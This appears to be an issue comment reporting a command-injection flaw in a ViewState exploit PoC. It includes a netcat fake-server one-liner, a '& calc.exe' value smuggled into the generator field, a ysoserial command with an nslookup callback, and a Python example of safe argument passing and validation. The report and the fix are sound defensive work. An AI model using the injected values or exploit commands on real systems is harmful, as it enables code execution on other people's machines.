Yo dawg #1

@Plazmaz

I made a PoC for your PoC so I can pop shells while you pop shells:

```sh
echo '''HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: localhost
Cookie: ASP.NET_SessionId=test-sess-id Time

<html>id="__VIEWSTATEGENERATOR" value="& calc.exe"</html>

''' |sudo nc -l 80
```

Assuming you're running your PoC as python3 exploit.py -s http://localhost/ -u admin -p admin and blindly running that, the output command becomes:
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey=& calc.exe --generator="B97B4E27" --viewstateuserkey=test-sess-id --isdebug --islegacy
```
which pops calc. I know this is totally outside the scope of this little PoC but I just got a kick out of it. Python has some really nice utils for shelling out while also escaping params:
https://docs.python.org/3/library/subprocess.html#subprocess.run
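The defect the comment above points at is a server-controlled value (the `__VIEWSTATEGENERATOR` field) being pasted into a shell command line. The following is an added example, not code from the PoC or from this issue: it extracts the generator the same way a scraper would, shows how a POSIX shell would tokenise the interpolated string (the `&` becomes a separate command separator), and contrasts that with passing an argv list to `subprocess.run` with `shell=False`, where the hostile value arrives in the child as one ordinary argument. The sample HTML, the `KEY_PLACEHOLDER` validation key and the `example.invalid` hostname are constructed; the assumption that a legitimate generator is eight hex digits (as `B97B4E27` is) and the argument order of the `ysoserial.exe` line are assumptions, not the PoC's real behaviour.

```python
import json
import re
import shlex
import subprocess
import sys

# Constructed sample responses: the hostile one mirrors the server in the issue,
# the benign one carries the generator value shown in the comment.
HOSTILE_HTML = '<html>id="__VIEWSTATEGENERATOR" value="& calc.exe"</html>'
BENIGN_HTML = '<html>id="__VIEWSTATEGENERATOR" value="B97B4E27"</html>'

GENERATOR_RE = re.compile(r'id="__VIEWSTATEGENERATOR"\s+value="([^"]*)"')


def extract_generator(html: str) -> str:
    """Pull the generator value out of the page body, as a PoC scraper would."""
    m = GENERATOR_RE.search(html)
    if m is None:
        raise ValueError("no __VIEWSTATEGENERATOR field in response")
    return m.group(1)


def build_command_unsafe(generator: str, key: str, session: str) -> str:
    """The vulnerable pattern: untrusted text interpolated into one shell line.
    Returned only for inspection; it is never handed to a shell in this file."""
    return (
        "ysoserial.exe -p ViewState -g TextFormattingRunProperties "
        '-c "nslookup example.invalid" --validationalg="SHA1" '
        f"--validationkey={key} --generator={generator} "
        f"--viewstateuserkey={session} --isdebug --islegacy"
    )


def shell_tokens(cmd: str) -> list:
    """Tokenise cmd the way a POSIX shell would, keeping operators such as & as
    their own tokens, so an injected command separator is visible."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def build_command_safe(generator: str, key: str, session: str) -> list:
    """The fix: one list element per argument, no shell involved."""
    return [
        "ysoserial.exe", "-p", "ViewState", "-g", "TextFormattingRunProperties",
        "-c", "nslookup example.invalid", "--validationalg=SHA1",
        f"--validationkey={key}", f"--generator={generator}",
        f"--viewstateuserkey={session}", "--isdebug", "--islegacy",
    ]


def validate_generator(value: str) -> str:
    """Defence in depth: reject anything that does not look like a generator.
    Assumption: a legitimate __VIEWSTATEGENERATOR is eight hex digits."""
    if not re.fullmatch(r"[0-9A-Fa-f]{8}", value):
        raise ValueError(f"refusing suspicious generator value: {value!r}")
    return value


def argv_as_child_receives(argv: list) -> list:
    """Run a harmless stand-in for the tool with shell=False and return the argv
    the child process actually saw (the stand-in is this Python interpreter)."""
    echo = [sys.executable, "-c", "import json, sys; print(json.dumps(sys.argv[1:]))"]
    result = subprocess.run(echo + argv[1:], capture_output=True, text=True, check=True)
    return json.loads(result.stdout)


if __name__ == "__main__":
    gen = extract_generator(HOSTILE_HTML)
    print("shell would see:", shell_tokens(build_command_unsafe(gen, "KEY_PLACEHOLDER", "test-sess-id")))
    print("child received:", argv_as_child_receives(build_command_safe(gen, "KEY_PLACEHOLDER", "test-sess-id")))
    try:
        validate_generator(gen)
    except ValueError as exc:
        print(exc)
```

Running it shows the `&` and `calc.exe` as separate shell tokens in the interpolated version, while the list-based version delivers `--generator=& calc.exe` to the child as a single argument; the validator rejects it outright before any command is built.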
